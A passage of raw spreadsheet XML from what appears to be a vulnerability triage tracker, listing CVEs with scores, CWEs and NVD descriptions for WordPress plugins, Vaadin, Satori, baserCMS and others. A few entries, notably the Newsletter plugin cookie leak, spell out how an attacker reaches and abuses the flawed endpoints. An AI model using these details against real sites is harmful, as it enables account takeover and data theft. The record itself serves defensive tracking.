      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S510" s="5" t="inlineStr">
        <is>
          <t>The Newsletter – Send awesome emails from WordPress plugin for WordPress is vulnerable to Insufficiently Protected Credentials in all versions up to, and including, 9.3.9 The plugin's public click-tracking REST route `/tnp/l/` is registered with `permission_callback =&gt; '__return_true'` and, upon receiving a valid keyed-MD5 signature, calls `set_user_cookie()`, which emits a `Set-Cookie: newsletter=&lt;id&gt;-&lt;raw_token&gt;` response header to the requester because the subscriber object loaded via `get_user()` lacks the `_trusted` property, causing `get_user_key()` to return the raw token column value instead of its MD5-masked variant. This makes it possible for unauthenticated attackers who obtain any signed click-tracking URL for a target subscriber to receive that subscriber's permanent raw authentication cookie, which they can then use to export the subscriber's full PII record via the JSON profile-export endpoint (`?na=px`), rewrite the subscriber's stored profile (`?na=ps`), and silently unsubscribe the subscriber via the RFC-8058 one-click endpoint (`?na=ocu`), none of which require a nonce, password, or email challenge. Signed tracking URLs are embedded in every external link of every newsletter delivered to a subscriber, carry no timestamp, and never expire until the site's relink key rotates, meaning that any party who observes such a URL — through a forwarded email, a shared inbox, a mail-gateway log, or Referer headers on the redirect target, which has no Referrer-Policy set — can replay it indefinitely to obtain the victim's credential.</t>
        </is>
      </c>
      <c r="T510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92537</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92548</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S511" s="5" t="inlineStr">
        <is>
          <t>The WP Popular Posts plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.4.2 via the 'context' parameter. This makes it possible for unauthenticated attackers to extract sensitive edit-context fields — including raw title, raw content body, password, meta, status, and guid — from non-public post objects such as wp_block synced patterns that WordPress core itself refuses to expose to unauthenticated callers. This is possible because the plugin's REST route is registered with a permission_callback of __return_true and passes the caller-supplied context parameter (e.g., context=edit) directly to WP_REST_Posts_Controller::prepare_item_for_response() without invoking get_item_permissions_check() or check_read_permission(), while the underlying query accepts an arbitrary post_type value without enforcing public or show_in_rest visibility flags.</t>
        </is>
      </c>
      <c r="T511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92548</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92872</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S512" s="5" t="inlineStr">
        <is>
          <t>Pgpool-II inserts sensitive information into log file, which may allow an authenticated attacker to obtain the cluster information.</t>
        </is>
      </c>
      <c r="T512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92872</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93547</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>security@vaadin.com</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr">
        <is>
          <t>maven</t>
        </is>
      </c>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S513" s="5" t="inlineStr">
        <is>
          <t>A missing authorization check in the Vaadin Spreadsheet component allows an authenticated user of an application that renders a spreadsheet to add or replace cell comments on a sheet that has protection enabled, including on cells that are locked. Writing a comment to a cell that does not exist yet also creates the row and the cell.
Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:
Product version
Vaadin 23.1.0 - 23.6.13
Vaadin 24.0.0 - 24.9.21
Vaadin 24.10.0 - 24.10.9
Vaadin 25.0.0 - 25.1.11
Vaadin 25.2.0 - 25.2.6
Vaadin Framework 7 and 8 with the Spreadsheet add-on 2.0.0 - 3.1.0
Mitigation
Upgrade to 23.6.14
Upgrade to 24.9.22
Upgrade to 24.10.10
Upgrade to 25.1.12
Upgrade to 25.2.7 or newer
Upgrade the Spreadsheet add-on to 3.1.1
Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, 25 version.
Artifacts
Maven coordinates Vulnerable versions Fixed version
com.vaadin:vaadin 23.1.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin 24.0.0 - 24.9.21 &gt;=24.9.22
com.vaadin:vaadin 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-spreadsheet-flow 23.1.0 - 23.6.13 &gt;=23.6.14
com.vaadin:vaadin-spreadsheet-flow 24.0.0 - 24.9.21 &gt;=24.9.22
com.vaadin:vaadin-spreadsheet-flow 24.10.0 - 24.10.9 &gt;=24.10.10
com.vaadin:vaadin-spreadsheet-flow 25.0.0 - 25.1.11 &gt;=25.1.12
com.vaadin:vaadin-spreadsheet-flow 25.2.0 - 25.2.6 &gt;=25.2.7
com.vaadin:vaadin-spreadsheet 2.0.0 - 3.1.0 &gt;=3.1.1</t>
        </is>
      </c>
      <c r="T513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93547</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94545</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S514" s="5" t="inlineStr">
        <is>
          <t>Satori is a library to convert HTML and CSS to SVG. Starting in version 0.0.27 and prior to version 0.33.5, Satori does not properly escape certain values before including them in generated SVG output. This can allow crafted values to be interpreted as SVG markup. The impact depends on how the generated SVG is consumed. Version 0.33.5 contains a patch. No complete workaround exists besides upgrading. Applications that cannot immediately upgrade should not render attacker-controlled content with Satori.</t>
        </is>
      </c>
      <c r="T514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94545</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94673</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S515" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in Simply Schedule Appointments &lt;= 1.6.12.31 versions.</t>
        </is>
      </c>
      <c r="T515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94673</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97066</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S516" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in GiveWP &lt;= 4.16.9 versions.</t>
        </is>
      </c>
      <c r="T516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97066</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97078</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S517" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in Client Invoicing by Sprout Invoices &lt;= 20.8.17 versions.</t>
        </is>
      </c>
      <c r="T517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97078</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97249</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S518" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Bypass Vulnerability in Paid Member Subscriptions &lt;= 3.0.9 versions.</t>
        </is>
      </c>
      <c r="T518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97249</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97259</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S519" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key vulnerability in WP Hosting AS Pay with Vipps for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Pay with Vipps for WooCommerce: from n/a through 6.2.4.</t>
        </is>
      </c>
      <c r="T519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97259</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97261</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S520" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in Notivo &lt;= 1.4.2 versions.</t>
        </is>
      </c>
      <c r="T520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97261</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97282</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S521" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in Review Schema &lt;= 3.1.0 versions.</t>
        </is>
      </c>
      <c r="T521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97282</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97302</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr"/>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S522" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in MPG &lt;= 4.2.3 versions.</t>
        </is>
      </c>
      <c r="T522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97302</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102459</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S523" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has a Reflected Cross-site Scripting vulnerability. Unauthenticated remote attackers can execute arbitrary JavaScript codes in user's browser through phishing attacks.</t>
        </is>
      </c>
      <c r="T523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102459</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93460</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S524" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting vulnerability via appended strings in email form fields exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.</t>
        </is>
      </c>
      <c r="T524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93460</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93463</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S525" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Scripting via Script Validation Bypass exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser may be caused.</t>
        </is>
      </c>
      <c r="T525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93463</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
